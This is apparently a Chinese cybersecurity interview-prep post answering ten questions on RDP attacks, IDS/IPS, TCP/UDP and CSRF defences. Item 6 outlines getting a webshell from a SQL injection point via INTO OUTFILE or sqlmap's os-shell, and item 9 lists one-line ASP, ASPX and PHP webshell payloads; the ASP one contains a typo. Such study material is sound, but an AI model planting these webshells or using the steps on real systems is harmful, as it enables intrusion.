1、什么是远程桌面协议(RDP)攻击?如何避免?
RDP攻击是指攻击者利用RDP协议的漏洞或使用暴力破解方法获取对远程计算机的访问权限。为了避免RDP攻击,组织可以采取以下措施:限制RDP访问,配置安全设置、使用多因素身份验证,禁用弱密码和配置防火墙以限制入站流量。
2、什么是入侵检测系统(IDS)和入侵防御系统(IPS)?它们有何不同?
IDS和IPS都是网络安全设备,它们的作用是监视网络活动并响应潜在威胁。IDS被用来监视网络流量并生成警报,以便安全团队能够及时进行调查。IPS则可以根据预设规则自动阻止潜在的攻击。这是两个不同的设备,其中IDS被用来监视网络流量并生成警报,而IPS能够自动响应潜在的威胁。
3、CIA三元组:
机密性(Confidentiality)
完整性(Integrity)
可用性(Availability)
4、TCP和UDP协议的区别:
tcp面向连接,udp面向报文。
tcp对系统资源的要求多,udp结构简单。
tcp保证数据完整性和顺序,udp不保证。
5、http长连接和短链接的区别:
在HTTP/1.0中默认使用短链接。也就是说,客户端和服务器每进行一次http操作,就建立一次连接,任务结束就终端连接。而从HTTP/1.1起,默认使用长连接,用以保持连接特性。
6、发现demo.jsp?uid=110注入点,你有哪几种思路获取webshell:
有写入权限的,构造联合查询语句使用using INTO OUTFILE,可以将查询的输出重定向到系统的文件中,这样去写入webshell使用sqlmap -os-shell 原理和前面一种相同,来直接获得一个shell,这样效率更高。
通过构造联合查询语句得到网站管理员的账户和密码,然后扫后台,再在后台通过改包上传等方法上传shell。
7、token和referer做横向对比,谁安全等级高:
token安全等级更高,因为并不是任何服务器都可以取得referer,如果从HTTPS跳转到HTTP,也不会发送referer。并且FLASH一些版本中可以自定义referer。但是token的话,要保证足够随机且不可泄露。
8、对referer的验证,从什么角度去做?如果做,怎么杜绝问题:
对header中的referer的验证,一个是空referer,一个是referer过滤或者检测不完善。为了杜绝这种问题,在验证的白名单中,正则规则应当写完善。
9、简述你知道的一句话木马:
ASP:<%evall request("cmd")%>
ASP.NET:(aspx)
<%@ Page Language="Jscript"%>
<%eval(Request.Item["cmd","unsafe"]);%>
PHP:<?php @eval($_REQUEST['cmd']);?>
10、域内横向移动:
在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器得访问权限,甚至完全控制基于Windows操作系统得整个内网环境,控制域环境下得全部机器。
每天10道,持续更新中。。。。。
4499
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
